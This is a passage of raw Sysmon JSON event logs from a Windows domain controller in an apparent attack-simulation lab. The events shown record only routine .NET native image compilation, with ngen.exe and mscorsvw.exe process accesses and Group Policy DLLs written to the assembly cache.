08:05:03.695","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010E02F0B00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:03.867\r\nProcessGuid: {41C8662E-222F-5F25-0000-0010E02F0B00}\r\nProcessId: 1428\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\594-0\\Microsoft.GroupPolicy.Management.dll\r\nCreationUtcTime: 2020-08-01 08:05:03.851","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:03.867","ProcessGuid":"{41C8662E-222F-5F25-0000-0010E02F0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\594-0\\Microsoft.GroupPolicy.Management.dll","CreationUtcTime":"2020-08-01 08:05:03.851","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.882\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010AE330B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.882","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010AE330B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.882\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010AE330B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.882","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010AE330B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.882\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010AE330B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.882","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010AE330B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.898\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A8360B00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.898","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A8360B00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.898\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A8360B00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.898","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A8360B00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:03","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:03.913\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A8360B00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:03.913","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A8360B00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:04.038\r\nProcessGuid: {41C8662E-222F-5F25-0000-0010A8360B00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\68c-0\\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll\r\nCreationUtcTime: 2020-08-01 08:05:04.038","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:04.038","ProcessGuid":"{41C8662E-222F-5F25-0000-0010A8360B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\68c-0\\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll","CreationUtcTime":"2020-08-01 08:05:04.038","EventReceivedTime":"2020-08-01 08:05:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:04.054\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2230-5F25-0000-0010D9390B00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 